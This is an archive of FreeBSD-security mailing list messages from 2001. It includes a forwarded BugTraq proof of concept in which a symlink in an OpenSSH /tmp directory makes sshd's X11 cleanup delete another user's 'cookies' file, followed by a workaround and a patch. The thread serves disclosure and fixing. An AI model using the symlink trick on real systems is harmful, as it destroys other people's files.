List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org You could always is ipnat and IPF with ipmon works very well giving logs outputs to syslog like: 04/06/2001 21:34:37.297183 xl0 @0:23 b 195.112.227.10 -> 64.219.216.68 PR icmp len 20 56 icmp 3/1 for 64.219.216.68,113 - 195.112.240.61,51518 PR tcp len 20 40 IN ipf howto: http://www.obfuscation.org/ipf/ ----- Original Message ----- From: "Heimes, Rene" To: Sent: Tuesday, June 05, 2001 4:24 AM Subject: security log file parser / ids hiho! i am searching for a parser that parses security logs from ipfw-made up logs. anyone got a hint? (btw: what about ipfw firewalls - outdated? what would be better? ipchains? help!) other question - whats the (freeware) ids of your choice / "state of the art" for freeBSD? great thanks in advance, rené **************************************************** "who fights might loose - who does not fight has lost immediately" Bertolt Brecht (freely adapted ;-) **************************************************** To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 5 14:55: 3 2001 Delivered-To: freebsd-security@freebsd.org Received: from ariel.phys.wesleyan.edu (ariel.phys.wesleyan.edu [129.133.71.143]) by hub.freebsd.org (Postfix) with ESMTP id 301EA37B401 for ; Tue, 5 Jun 2001 14:54:58 -0700 (PDT) (envelope-from vlad@ariel.phys.wesleyan.edu) Received: by ariel.phys.wesleyan.edu (Postfix, from userid 1001) id 8B3A51EA30C; Tue, 5 Jun 2001 17:55:03 -0400 (EDT) Received: from localhost (localhost [127.0.0.1]) by ariel.phys.wesleyan.edu (Postfix) with ESMTP id 88C391E650C; Tue, 5 Jun 2001 17:55:03 -0400 (EDT) Date: Tue, 5 Jun 2001 17:55:03 -0400 (EDT) From: Vladimir Savichev To: Cc: Subject: Re: rpc.statd attack before ipfw activated Message-ID: <20010605174214.J90423-100000@ariel.phys.wesleyan.edu> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org how interesting. I'm here on FreeBSD ariel.phys.wesleyan.edu 4.3-STABLE FreeBSD 4.3-STABLE #2: Sun Jun 3 21:23:38 EDT 20 01 root@ariel.phys.wesleyan.edu:/usr/obj/usr/src/sys/ARIEL i386 I got pretty much similar log several times for a last couple of days, was wondering what the hell rpc is doing. Could you point me where I can read more about. How can I log call hosts. --Vlad To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 5 15:12:56 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.webmonster.de (datasink.webmonster.de [194.162.162.209]) by hub.freebsd.org (Postfix) with SMTP id 5BC7037B401 for ; Tue, 5 Jun 2001 15:12:44 -0700 (PDT) (envelope-from karsten@rohrbach.de) Received: (qmail 87297 invoked by uid 1000); 5 Jun 2001 22:13:03 -0000 Date: Wed, 6 Jun 2001 00:13:03 +0200 From: "Karsten W. Rohrbach" To: "Peter C. Lai" Cc: freebsd-security@freebsd.org Subject: Re: "Legal Disclaimers" Was: Apache Software Foundation Server compromised, resecured. Message-ID: <20010606001303.G86212@mail.webmonster.de> Mail-Followup-To: "Karsten W. Rohrbach" , "Peter C. Lai" , freebsd-security@freebsd.org References: <20010604194220.93548.qmail@web11807.mail.yahoo.com> <20010604151245.A15758@NOC.maKintosh.com> <003d01c0edcb$702fd1e0$8caa6389@resnet.uconn.edu> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="m972NQjnE83KvVa/" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <003d01c0edcb$702fd1e0$8caa6389@resnet.uconn.edu>; from sirmoo@cowbert.2y.net on Tue, Jun 05, 2001 at 10:25:57AM -0400 X-Arbitrary-Number-Of-The-Day: 42 X-URL: http://www.webmonster.de/ X-Disclaimer: My opinions do not necessarily represent those of my employer Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --m972NQjnE83KvVa/ Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Peter C. Lai(sirmoo@cowbert.2y.net)@2001.06.05 10:25:57 +0000: > The truth is, that many companies and private organizations actually do > filter all mail not just for viruses but many do it for "non-work-related" > activities, because they feel that one shouldn't use company bandwidth to [...] some users cannot quote correctly (me too, sometimes). some users use badly broken MUA software: --- > X-MSMail-Priority: Normal > X-Mailer: Microsoft Outlook Express 5.50.4522.1200 > X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 --- some users are unable to use pgp. several others got the clue. several are "enabled". do you want to be enabled, too? /k --=20 > I can emulate the Beta-version of every C #include > program I've ever written in two lines! -> main() {raise(11);} KR433/KR11-RIPE -- WebMonster Community Founder -- nGENn GmbH Senior Techie http://www.webmonster.de/ -- ftp://ftp.webmonster.de/ -- http://www.ngenn.n= et/ karsten&rohrbach.de -- alpha&ngenn.net -- alpha&scene.org -- catch@spam.de GnuPG 0x2964BF46 2001-03-15 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 B= F46 --m972NQjnE83KvVa/ Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7HVlvM0BPTilkv0YRAl/vAKDCSerQ6wAVqBcccY2foGZZjh4fgwCgprZh 34EgA/medzdaoI0yWGzQ+eA= =LfEK -----END PGP SIGNATURE----- --m972NQjnE83KvVa/-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 6 2:47:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from burka.carrier.kiev.ua (burka.carrier.kiev.ua [193.193.193.107]) by hub.freebsd.org (Postfix) with ESMTP id 650A537B407 for ; Wed, 6 Jun 2001 02:47:06 -0700 (PDT) (envelope-from netch@lucky.net) Received: from netch@localhost (netch@localhost) by burka.carrier.kiev.ua id MSC30966 for security@freebsd.org; Wed, 6 Jun 2001 12:47:02 +0300 (EEST) (envelope-from netch) Date: Wed, 6 Jun 2001 12:47:02 +0300 From: Valentin Nechayev To: security@freebsd.org Subject: [fwd] SSH allows deletion of other users files... Message-ID: <20010606124702.A30808@lucky.net> Reply-To: netch@lucky.net Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="7JfCtLOvnd9MIVvH" Content-Disposition: inline X-42: On Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --7JfCtLOvnd9MIVvH Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Is it applicable to FreeBSD? (BugTraq contains report that it is) /netch --7JfCtLOvnd9MIVvH Content-Type: message/rfc822 Content-Disposition: inline Return-Path: Received: from outgoing3.securityfocus.com [66.38.151.27] by burka.carrier.kiev.ua with ESMTP id SHL33333 for ; Mon, 4 Jun 2001 18:19:18 +0300 (EEST) (envelope-from bugtraq-return-246-netch=lucky.net@securityfocus.com) Received: from lists.securityfocus.com (lists.securityfocus.com [66.38.151.19]) by outgoing.securityfocus.com (Postfix) with SMTP id 42FFBA54B0 for ; Mon, 4 Jun 2001 09:19:10 -0600 (MDT) Received: (qmail 17878 invoked by alias); 4 Jun 2001 14:55:02 -0000 Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm Precedence: bulk List-Id: List-Post: List-Help: List-Unsubscribe: List-Subscribe: Delivered-To: mailing list bugtraq@securityfocus.com Delivered-To: moderator for bugtraq@securityfocus.com Received: (qmail 10486 invoked from network); 4 Jun 2001 10:12:01 -0000 Date: Mon, 4 Jun 2001 22:14:29 +1200 (NZST) From: X-X-Sender: To: Subject: SSH allows deletion of other users files... Message-ID: Mime-Version: 1.0 Content-Transfer-Encoding: 8bit Content-Type: text/plain; charset=koi8-u SSH allows deletion of other users files. ========================================= You can delete any file on the filesystem you want... as long as its called cookies. Not really a very useful bug, but could cause annoyances to people who actually like their cookies. /home/zen/.netscape/cookies sample exploit:- [root@clarity /root]# touch /cookies;ls /cookies /cookies [root@clarity /root]# ssh zen@localhost zen@localhost's password: Last login: Mon Jun 4 20:22:39 2001 from localhost.local Linux clarity 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown [zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9 [zen@clarity zen]$ logout Connection to localhost closed. [root@clarity /root]# ls /cookies /bin/ls: /cookies: No such file or directory --zen-parse --7JfCtLOvnd9MIVvH-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 6 3:48:29 2001 Delivered-To: freebsd-security@freebsd.org Received: from consistent.unicore.no (transmogrify.unicore.no [194.19.38.10]) by hub.freebsd.org (Postfix) with ESMTP id BD2AB37B406 for ; Wed, 6 Jun 2001 03:48:26 -0700 (PDT) (envelope-from andreas@consistent.unicore.no) Received: (from andreas@localhost) by consistent.unicore.no (8.11.1/8.11.1) id f56AmMS26597 for security@freebsd.org; Wed, 6 Jun 2001 12:48:22 +0200 (CEST) (envelope-from andreas) Date: Wed, 6 Jun 2001 12:48:22 +0200 From: Andreas Haugsnes To: security@freebsd.org Subject: Re: [fwd] SSH allows deletion of other users files... Message-ID: <20010606124822.A26583@consistent.unicore.no> References: <20010606124702.A30808@lucky.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010606124702.A30808@lucky.net>; from netch@lucky.net on Wed, Jun 06, 2001 at 12:47:02PM +0300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I've tested it with FreeBSD 4.3, and I have not found this bug to apply. - Andreas Haugsnes On Wed, Jun 06, 2001 at 12:47:02PM +0300, Valentin Nechayev wrote: > Is it applicable to FreeBSD? > (BugTraq contains report that it is) > > > /netch To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 6 4:11:30 2001 Delivered-To: freebsd-security@freebsd.org Received: from consistent.unicore.no (transmogrify.unicore.no [194.19.38.10]) by hub.freebsd.org (Postfix) with ESMTP id ED01B37B403 for ; Wed, 6 Jun 2001 04:11:27 -0700 (PDT) (envelope-from andreas@consistent.unicore.no) Received: (from andreas@localhost) by consistent.unicore.no (8.11.1/8.11.1) id f56BBUm26648 for security@freebsd.org; Wed, 6 Jun 2001 13:11:30 +0200 (CEST) (envelope-from andreas) Date: Wed, 6 Jun 2001 13:11:30 +0200 From: Andreas Haugsnes To: security@freebsd.org Subject: Re: [fwd] SSH allows deletion of other users files... Message-ID: <20010606131130.A26605@consistent.unicore.no> References: <20010606124702.A30808@lucky.net> <20010606124822.A26583@consistent.unicore.no> <20010606125321.A56634@mithrandr.moria.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010606125321.A56634@mithrandr.moria.org>; from nbm@mithrandr.moria.org on Wed, Jun 06, 2001 at 12:53:21PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Ahh, tested it now, yes, it is vulnerable. But wouldn't an easy workaround be too disable all X11-forwarding in sshd? I had it to 'no' here, but that was not per default. - Andreas Haugsnes On Wed, Jun 06, 2001 at 12:53:21PM +0200, Neil Blakey-Milner wrote: > > Are you using X forwarding? (ie, ssh -X) > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 6 4:34:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 6504337B401 for ; Wed, 6 Jun 2001 04:34:35 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 46861 invoked by uid 1000); 6 Jun 2001 11:33:24 -0000 Date: Wed, 6 Jun 2001 14:33:23 +0300 From: Peter Pentchev To: Andreas Haugsnes Cc: security@freebsd.org Subject: Re: [fwd] SSH allows deletion of other users files... Message-ID: <20010606143323.G18735@ringworld.oblivion.bg> Mail-Followup-To: Andreas Haugsnes , security@freebsd.org References: <20010606124702.A30808@lucky.net> <20010606124822.A26583@consistent.unicore.no> <20010606125321.A56634@mithrandr.moria.org> <20010606131130.A26605@consistent.unicore.no> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010606131130.A26605@consistent.unicore.no>; from andreas@haugsnes.no on Wed, Jun 06, 2001 at 01:11:30PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jun 06, 2001 at 01:11:30PM +0200, Andreas Haugsnes wrote: > Ahh, tested it now, yes, it is vulnerable. > But wouldn't an easy workaround be too disable all X11-forwarding in sshd? > I had it to 'no' here, but that was not per default. > > > - Andreas Haugsnes > > On Wed, Jun 06, 2001 at 12:53:21PM +0200, Neil Blakey-Milner wrote: > > > > Are you using X forwarding? (ie, ssh -X) Yes, disabling X forwarding would be an easy workaround. Can somebody, however, test if the following patch resolves the problem? It certainly does for me.. Well, ok, so there is still a race condition between the stat() and unlink() in the cleanup procedure.. but since there is no funlink() yet, I do not really think this one can be resolved :( And besides, there's a *much* smaller window of opportunity there. The attached patch is against RELENG_4, but it applies cleanly to the newer OpenSSH in -current. G'luck, Peter -- No language can express every thought unambiguously, least of all this one. Index: src/crypto/openssh/session.c =================================================================== RCS file: /home/ncvs/src/crypto/openssh/session.c,v retrieving revision 1.4.2.8 diff -u -r1.4.2.8 session.c --- src/crypto/openssh/session.c 2001/03/22 00:28:35 1.4.2.8 +++ src/crypto/openssh/session.c 2001/06/06 11:29:07 @@ -116,6 +116,7 @@ /* Local Xauthority file. */ static char *xauthfile; +static struct stat xauthfile_sbuf; /* original command from peer. */ char *original_command = NULL; @@ -138,6 +139,33 @@ if (xauthfile != NULL) { char *p; + struct stat sb; + + if ((xauthfile_sbuf.st_dev != 0) || + (xauthfile_sbuf.st_ino != 0)) { + debug("xauthfile sbuf/ino != 0, checking.."); + if (stat(xauthfile, &sb) == -1) { + error("cannot stat xauthfile %s: %s", + xauthfile, strerror(errno)); + /* bail out, do not remove! */ + xfree(xauthfile); + xauthfile = NULL; + return; + } + if ((sb.st_dev != xauthfile_sbuf.st_dev) || + (sb.st_ino != xauthfile_sbuf.st_ino)) { + error("xauthfile dev/ino mismatch! " + "expected: %lu/%lu, got %lu/%lu", + xauthfile_sbuf.st_dev, + xauthfile_sbuf.st_ino, + sb.st_dev, sb.st_ino); + /* bail out, do not remove! */ + xfree(xauthfile); + xauthfile = NULL; + return; + } + debug("sbuf/ino match"); + } unlink(xauthfile); p = strrchr(xauthfile, '/'); if (p != NULL) { @@ -322,6 +350,7 @@ break; /* Setup to always have a local .Xauthority. */ + memset(&xauthfile_sbuf, 0, sizeof(xauthfile_sbuf)); xauthfile = xmalloc(MAXPATHLEN); strlcpy(xauthfile, "/tmp/ssh-XXXXXXXX", MAXPATHLEN); temporarily_use_uid(pw->pw_uid); @@ -336,8 +365,20 @@ } strlcat(xauthfile, "/cookies", MAXPATHLEN); fd = open(xauthfile, O_RDWR|O_CREAT|O_EXCL, 0600); - if (fd >= 0) + if (fd >= 0) { + if (fstat(fd, &xauthfile_sbuf) == -1) { + debug("fstat(xauthfile) failed: %s", + strerror(errno)); + memset(&xauthfile_sbuf, 0, + sizeof(xauthfile_sbuf)); + } else { + debug("fstat(xauthfile) success: " + "dev %lu, ino %lu", + xauthfile_sbuf.st_dev, + xauthfile_sbuf.st_ino); + } close(fd); + } restore_uid(); fatal_add_cleanup(xauthfile_cleanup_proc, NULL); success = 1; @@ -1651,6 +1692,7 @@ xfree(s->auth_data); return 0; } + memset(&xauthfile_sbuf, 0, sizeof(xauthfile_sbuf)); xauthfile = xmalloc(MAXPATHLEN); strlcpy(xauthfile, "/tmp/ssh-XXXXXXXX", MAXPATHLEN); temporarily_use_uid(s->pw->pw_uid); @@ -1667,8 +1709,17 @@ } strlcat(xauthfile, "/cookies", MAXPATHLEN); fd = open(xauthfile, O_RDWR|O_CREAT|O_EXCL, 0600); - if (fd >= 0) + if (fd >= 0) { + if (fstat(fd, &xauthfile_sbuf) == -1) { + debug("fstat(xauthfile) failed: %s", + strerror(errno)); + memset(&xauthfile_sbuf, 0, sizeof(xauthfile_sbuf)); + } else { + debug("fstat(xauthfile) success: dev %lu, ino %lu", + xauthfile_sbuf.st_dev, xauthfile_sbuf.st_ino); + } close(fd); + } restore_uid(); fatal_add_cleanup(xauthfile_cleanup_proc, s); return 1; To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 6 8:12:21 2001 Delivered-To: freebsd-security@freebsd.org Received: from slis-two.lis.fsu.edu (slis-two.lis.fsu.edu [128.186.72.102]) by hub.freebsd.org (Postfix) with ESMTP id F014637B40A for ; Wed, 6 Jun 2001 08:12:16 -0700 (PDT) (envelope-from david@slis-two.lis.fsu.edu) Received: from localhost (david@localhost) by slis-two.lis.fsu.edu (8.11.1/8.11.1) with ESMTP id f56FE3049936 for ; Wed, 6 Jun 2001 11:14:03 -0400 (EDT) (envelope-from david@slis-two.lis.fsu.edu) Date: Wed, 6 Jun 2001 11:14:03 -0400 (EDT) From: David Miner To: Subject: Encrypted passwords Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org A while back there was a good discussion on using encrypted passwords to "automatically" create user accounts. I haave a need to create classroom accounts every semester and (borrowing freely from adduser) created the following perl script. But something is not right and I have to go in and manually change the passwords to what I want. The program asks for a password file name and the file contains passwords that I have approved as meeting my standards. The problem seems to be in how they get encrypted. Suggestions, please? -------------------Begin Program----------------------- #!/usr/bin/perl sub check_root { die "You are not root!\n" if $< && !$test; } sub salt { local($salt); # initialization local($i, $rand); local(@itoa64) = ( '0' .. '9', 'a' .. 'z', 'A' .. 'Z' ); # 0 .. 63 # to64 for ($i = 0; $i < 8; $i++) { srand(time + $rand + $$); $rand = rand(25*29*17 + $rand); $salt .= $itoa64[$rand & $#itoa64]; } return $salt; } sub get_pw_file { print "Enter password file name: "; chop($read = ); open (P1, $read); @pwd1 = ; print "Password file read", "\n"; close P1; } #main &get_pw_file; print "Enter path to home directories: "; chop($home=); # default HOME print "Enter class name: "; chop($b=); #class name print "Enter first number wanted: "; chop($a=); #first number wanted print "Enter number of users wanted: "; chop($r=); #number of users wanted $c=$r+$a; $s = "/bin/csh"; open (DEL,">$b\-del"); open (PWD, ">$b\-pwd"); for (;$a<($c);$a++) { $name="$b\-$a"; $fullname= "LIS".$name; $userhome="$home\/$name"; print $name," ",$pwd1[$a]," \n"; print (DEL "pw userdel -n $name \n"); print (PWD "The password for $name is $pwd1[$a] \n"); $cryptpwd = ""; $cryptpwd = crypt($pwd1[$a], &salt); system(`pw useradd -n $name -c $fullname -d $userhome -s $s -m; chpass -p $cryptpwd $name`); system(`mkdir $userhome\/public_html`); system(`chmod 755 $userhome\/public_html`); system(`chown $name:websitedev $userhome\/public_html`); } close ; -----------------End program------------------------- --------------------------------------------------------------------- David R. Miner miner@lis.fsu.edu Systems Integrator voice: 850-644-8107 School of Information Studies fax: 850-644-6253 Florida State University Tallahassee, FL 32306-2100 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 6 8:30:39 2001 Delivered-To: freebsd-security@freebsd.org Received: from sbtx.tmn.ru (sbtx.tmn.ru [212.76.160.49]) by hub.freebsd.org (Postfix) with ESMTP id 4352B37B406 for ; Wed, 6 Jun 2001 08:30:34 -0700 (PDT) (envelope-from serg@sbtx.tmn.ru) Received: from sv.tech.sibitex.tmn.ru (sv.tech.sibitex.tmn.ru [212.76.160.59]) by sbtx.tmn.ru (8.11.3/8.11.3) with ESMTP id f56FUVI31317; Wed, 6 Jun 2001 21:30:33 +0600 (YEKST) (envelope-from serg@sbtx.tmn.ru) Received: (from serg@localhost) by sv.tech.sibitex.tmn.ru (8.11.3/8.11.3) id f56FUQj00771; Wed, 6 Jun 2001 21:30:26 +0600 (YEKST) (envelope-from serg) Date: Wed, 6 Jun 2001 21:30:26 +0600 From: "Sergey N. Voronkov" To: David Miner Cc: freebsd-security@FreeBSD.ORG Subject: Re: Encrypted passwords Message-ID: <20010606213026.A755@sv.tech.sibitex.tmn.ru> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from david@slis-two.lis.fsu.edu on Wed, Jun 06, 2001 at 11:14:03AM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jun 06, 2001 at 11:14:03AM -0400, David Miner wrote: > A while back there was a good discussion on using encrypted passwords to > "automatically" create user accounts. > > I haave a need to create classroom accounts every semester and (borrowing > freely from adduser) created the following perl script. > > But something is not right and I have to go in and manually change the > passwords to what I want. > > The program asks for a password file name and the file contains passwords > that I have approved as meeting my standards. The problem seems to be in > how they get encrypted. > > Suggestions, please? Please look at http://www.FreeBSD.org/cgi/query-pr.cgi?pr=24953 I'v post hook against DES/MD5 encription. Bye, Serg. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 6 8:49:32 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.cs.ait.ac.th (mail.cs.ait.ac.th [192.41.170.16]) by hub.freebsd.org (Postfix) with ESMTP id E50E437B401 for ; Wed, 6 Jun 2001 08:49:28 -0700 (PDT) (envelope-from Olivier.Nicole@ait.ac.th) Received: from bazooka.cs.ait.ac.th (on@bazooka.cs.ait.ac.th [192.41.170.2]) by mail.cs.ait.ac.th (8.11.3/8.9.3) with ESMTP id f56M2MB08283; Thu, 7 Jun 2001 05:02:23 +0700 (ICT) From: Olivier Nicole Received: (from on@localhost) by bazooka.cs.ait.ac.th (8.8.5/8.8.5) id WAA02105; Wed, 6 Jun 2001 22:49:11 +0700 (ICT) Date: Wed, 6 Jun 2001 22:49:11 +0700 (ICT) Message-Id: <200106061549.WAA02105@bazooka.cs.ait.ac.th> To: david@slis-two.lis.fsu.edu Cc: freebsd-security@FreeBSD.ORG In-reply-to: (message from David Miner on Wed, 6 Jun 2001 11:14:03 -0400 (EDT)) Subject: Re: Encrypted passwords Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >The program asks for a password file name and the file contains passwords >that I have approved as meeting my standards. The problem seems to be in >how they get encrypted. Could you please be more specific? What do you mean it is not working? By the way, if any one is intrested, I can provide the Perl script that generates passwords like that: http://www.cs.ait.ac.th/cgi-bin/phi-soft/gen-multipasswd It used to produce English like words, but I recently added numbers and non alphanumerical characters, so it became ugly. It was preliminary based on some statistics about sets or 2 and 3 letters the way they appears in English words (some pages of Unix manual being the input :) Olivier To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 6 9: 1:11 2001 Delivered-To: freebsd-security@freebsd.org Received: from slis-two.lis.fsu.edu (slis-two.lis.fsu.edu [128.186.72.102]) by hub.freebsd.org (Postfix) with ESMTP id 6374137B401 for ; Wed, 6 Jun 2001 09:01:08 -0700 (PDT) (envelope-from david@slis-two.lis.fsu.edu) Received: from localhost (david@localhost) by slis-two.lis.fsu.edu (8.11.1/8.11.1) with ESMTP id f56G2iS50691; Wed, 6 Jun 2001 12:02:44 -0400 (EDT) (envelope-from david@slis-two.lis.fsu.edu) Date: Wed, 6 Jun 2001 12:02:44 -0400 (EDT) From: David Miner To: Olivier Nicole Cc: Subject: Re: Encrypted passwords In-Reply-To: <200106061549.WAA02105@bazooka.cs.ait.ac.th> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 6 Jun 2001, Olivier Nicole wrote: > >The program asks for a password file name and the file contains passwords > >that I have approved as meeting my standards.The problem seems to be in > >how they get encrypted. > > Could you please be more specific? What do you mean it is not working? > Thanks to Sergey and Olivier, I have something else to look at. Also I see that my description of the problem was not sufficient. The passwords I pre-generate. I take a random name generator and run it several times, go in and add numbers and special characters and create a single text file. I then sort this file starting at character position 2 and incrementing until I have several files with the same passwords but in different order. But when I encrypt them and put them in the passwd file, they do not allow the user to log in. I have to use the passwd program to manually change them to the same password that I wanted originally. Thus I believe the problem lies in the encryption method or how it is being passwd to the chpass program. When I inspect the passwd file with vipw, I see the encrypted password, but it just does not allow the user to log in. Thanks, David --------------------------------------------------------------------- David R. Miner miner@lis.fsu.edu Systems Integrator voice: 850-644-8107 School of Information Studies fax: 850-644-6253 Florida State University Tallahassee, FL 32306-2100 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 6 9:10:37 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.cs.ait.ac.th (mail.cs.ait.ac.th [192.41.170.16]) by hub.freebsd.org (Postfix) with ESMTP id 6461537B406 for ; Wed, 6 Jun 2001 09:10:10 -0700 (PDT) (envelope-from Olivier.Nicole@ait.ac.th) Received: from bazooka.cs.ait.ac.th (on@bazooka.cs.ait.ac.th [192.41.170.2]) by mail.cs.ait.ac.th (8.11.3/8.9.3) with ESMTP id f56MQvB08376; Thu, 7 Jun 2001 05:26:57 +0700 (ICT) From: Olivier Nicole Received: (from on@localhost) by bazooka.cs.ait.ac.th (8.8.5/8.8.5) id XAA02163; Wed, 6 Jun 2001 23:09:51 +0700 (ICT) Date: Wed, 6 Jun 2001 23:09:51 +0700 (ICT) Message-Id: <200106061609.XAA02163@bazooka.cs.ait.ac.th> To: david@slis-two.lis.fsu.edu Cc: Olivier.Nicole@ait.ac.th, freebsd-security@FreeBSD.ORG In-reply-to: (message from David Miner on Wed, 6 Jun 2001 12:02:44 -0400 (EDT)) Subject: Re: Encrypted passwords Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >But when I encrypt them and put them in the passwd file, they do not allow >the user to log in. I have to use the passwd program to manually change >them to the same password that I wanted originally. Thus I believe the >problem lies in the encryption method or how it is being passwd to the >chpass program. Hummm, I think nowdays passwords are not kept in a plain file but in a .db file. Can't it be the problem? Olivier To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 6 9:20:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from slis-two.lis.fsu.edu (slis-two.lis.fsu.edu [128.186.72.102]) by hub.freebsd.org (Postfix) with ESMTP id B7B5437B401 for ; Wed, 6 Jun 2001 09:20:23 -0700 (PDT) (envelope-from david@slis-two.lis.fsu.edu) Received: from localhost (david@localhost) by slis-two.lis.fsu.edu (8.11.1/8.11.1) with ESMTP id f56GM6S50951; Wed, 6 Jun 2001 12:22:06 -0400 (EDT) (envelope-from david@slis-two.lis.fsu.edu) Date: Wed, 6 Jun 2001 12:22:06 -0400 (EDT) From: David Miner To: Olivier Nicole Cc: Subject: Re: Encrypted passwords In-Reply-To: <200106061609.XAA02163@bazooka.cs.ait.ac.th> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 6 Jun 2001, Olivier Nicole wrote: > >But when I encrypt them and put them in the passwd file, they do not allow > >the user to log in.I have to use the passwd program to manually change > >them to the same password that I wanted originally.Thus I believe the > >problem lies in the encryption method or how it is being passwd to the > >chpass program. > > Hummm, I think nowdays passwords are not kept in a plain file but in a > .db file. Can't it be the problem? > > Olivier > No, the chpass function takes care calling mk-pwd and putting them in the .db file. Otherwise nothing would be there when I look at it with vipw. It appears that what is being passed by the crypt function is not what is making it into the passwd file. At a SWAG. David --------------------------------------------------------------------- David R. Miner miner@lis.fsu.edu Systems Integrator voice: 850-644-8107 School of Information Studies fax: 850-644-6253 Florida State University Tallahassee, FL 32306-2100 To Unsubscribe: 